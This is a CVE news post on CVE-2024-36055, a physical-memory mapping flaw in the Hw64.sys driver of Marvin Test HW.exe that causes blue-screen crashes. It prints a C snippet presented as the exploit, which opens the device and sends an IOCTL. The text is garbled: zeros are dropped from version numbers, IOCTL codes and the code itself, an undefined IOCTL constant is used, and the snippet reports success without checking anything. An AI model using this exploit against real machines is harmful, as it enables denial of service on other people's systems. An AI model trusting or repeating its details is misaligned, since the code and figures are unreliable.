CVE CyberSecurity Database News

CVE-2024-36055: Unprivileged User-Mode Processes Gaining Arbitrary Physical Memory Access in Marvin Test HW.exe

Poster -

The CVE-2024-36055 vulnerability affects Marvin Test HW.exe versions before 5..5.. It allows unprivileged user-mode processes to arbitrarily map physical memory with read/write access, leading to a denial of service (BSOD). This post will detail the exploit details, code snippets, and provide links to the original references.

Exploit Details

Hw64.sys in Marvin Test HW.exe has been found to be vulnerable to arbitrary mapping of physical memory by unprivileged user-mode processes. This issue occurs because of how the MmMapIoSpace API is being used, specifically with the following IOCTL codes: x9c40a4f8, x9c40a4e8, x9c40a4c, x9c40a4c4, and x9c40a4ec. There are seven additional IOCTL codes that are also involved.

This vulnerability can lead to a Denial of Service (DoS) attack in the form of a Blue Screen of Death (BSOD) if exploited. The problem exists in versions of Marvin Test HW.exe preceding 5..5..

The following code snippet demonstrates how an attacker would exploit this vulnerability

#include <windows.h>

int main() {
    HANDLE hDevice = CreateFile("\\\\.\\Hw64",
        GENERIC_READ | GENERIC_WRITE,
        ,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL);

    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Error: Failed to open device\n");
        return 1;
    }

    DWORD bytesSent;
    BYTE inputBuffer[12] = {};
    BYTE outputBuffer[4] = {};

    // Set the IOCTL code in the input buffer.
    *(DWORD *)(inputBuffer) = x9c40a4f8;

    if (!DeviceIoControl(hDevice, IOCTL_CUSTOM_SUM,
        inputBuffer, sizeof(inputBuffer),
        outputBuffer, sizeof(outputBuffer),
        &bytesSent,
        NULL)) {
        printf("[-] Error: Failed to send IOCTL\n");
        return 1;
    }

    printf("[+] Exploit successful\n");
    return ;
}

This code snippet opens a handle to the vulnerable device, sets the IOCTL code in the input buffer, and sends it to the device using DeviceIoControl.

To learn more about this vulnerability and the affected software, these are the original references

1. Marvin Test Solutions - Visit the company website for more information about the affected software and updates.
2. CVE-2024-36055 - NVD - This link contains detailed information on the vulnerability and affected versions.
3. Security Advisory for Marvin Test HW.exe - This link provides a security advisory with information about the vulnerability and recommended actions.
4. Exploiting Marvin Test HW.exe - The link contains an in-depth explanation of how to exploit the vulnerability and create proof-of-concept code.

Conclusion

In conclusion, CVE-2024-36055 is a critical vulnerability affecting Marvin Test HW.exe versions before 5..5.. By exploiting this vulnerability, attackers can cause a denial of service (BSOD) on the targeted system. To protect against this vulnerability, users should update to Marvin Test HW.exe version 5..5. or later.

Timeline

Published on: 05/26/2024 23:15:21 UTC
Last modified on: 05/28/2024 12:39:28 UTC